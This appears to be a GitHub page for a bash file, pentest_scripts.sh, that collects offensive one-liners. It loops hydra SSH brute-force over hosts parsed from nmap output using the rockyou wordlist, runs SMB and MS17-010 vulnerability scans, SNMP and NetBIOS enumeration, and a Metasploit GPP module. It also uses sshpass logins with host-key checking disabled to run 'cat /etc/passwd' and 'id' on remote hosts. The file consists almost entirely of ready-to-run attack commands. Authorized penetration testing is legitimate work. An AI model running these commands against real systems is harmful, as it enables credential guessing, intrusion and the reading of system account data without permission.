-
Notifications
You must be signed in to change notification settings - Fork 21
/
pentest_scripts.sh
executable file
·38 lines (26 loc) · 2.25 KB
/
pentest_scripts.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Read all .gnmap and try given user and password!
for host in $(cat */*.gnmap|grep "22/open"|cut -d" " -f2); do hydra -l USER -p PASSWD -I -t 1 -W 2 ssh://$host; done
# Read hydra output and find IP addresses that contains valid user&password
cat hydra_ssh |egrep "22|ssh|host:|login|password"|egrep -v "0 valid|DATA|completed|Hydra|does not|Timeout|ERROR"|awk '{ print $3 }'
# Hydra brute-force
hydra -l testuser -P /usr/share/wordlists/rockyou.txt -I -W 2 -t 5 ssh://10.0.0.1 -Vv
# Read all .gnmap and get snmp informations from the targets
for host in $(cat */*.gnmap|grep "161/open"|cut -d" " -f2); do snmp-check $host -t 3 -r 1 > ../snmp-info/$host; done
# Read all .gnmap and find smb attacks on port 445.
for host in $(cat */*.gnmap|grep "445/open"|cut -d" " -f2| sort -u); do nmap -p445 --script smb-vuln-* -Pn -n $host --open -oA ../smb-vuln/$host; done
# Nbtscan
nbtscan -r 10.0.0.0/24 > nbtscan.txt
# Read nbtscan results and find ms17_010 vuln on port 445.
for ip in $(cat nbtscan.txt|cut -d" " -f1); do nmap -n -Pn --open -p445 $ip --script smb-vuln-ms17*; done
# Find file size = 0 in the current directory.
list=`ls -la */live.txt`; for satir in $(echo $list); do size=`ls -la $satir 2>/dev/null|awk '{print $5}'|grep -o "0"`; if [[ $size == 0 ]]; then echo $satir; fi done
# Run 'cat /etc/passwd && hostname' commands on given ssh host list.
for host in $(cat ssh_host_list.txt); do sshpass -p 'password' ssh -o StrictHostKeyChecking=no USER@$host "/bin/cat /etc/passwd && hostname && id" > sshpass_dir/$host; done
# Find and show files that contains 'admin' string
files=`ls -l|awk '{print $9}'`; for file in $(echo $files); do size=`ls -l $file|awk '{print $5}'`; string=`cat $file|grep 'admin'`; if [[ $string != '' ]]; then echo $file; fi done
# Find and remove directories that contains empty live.txt file.
dirc=`ls -l|awk '{print $9}'`; for dir in $(echo $dirc); do size=`ls -l $dir|grep live.txt|awk '{print $5}'`; if [[ $size == 0 ]]; then rm -rf $dir; fi done
# Find all IP address of the nameservers given domain
domain="twitter.com"; nameservers=`dig $domain NS|grep $domain.|egrep -v ";$domain|DiG"|awk '{print $5}'|sed 's/.$//'`; for ns in $nameservers; do res=`dig $ns +short`; echo $res $ns; done
#Domain GPP module
msfconsole -> scanner/smb/smb_enum_gpp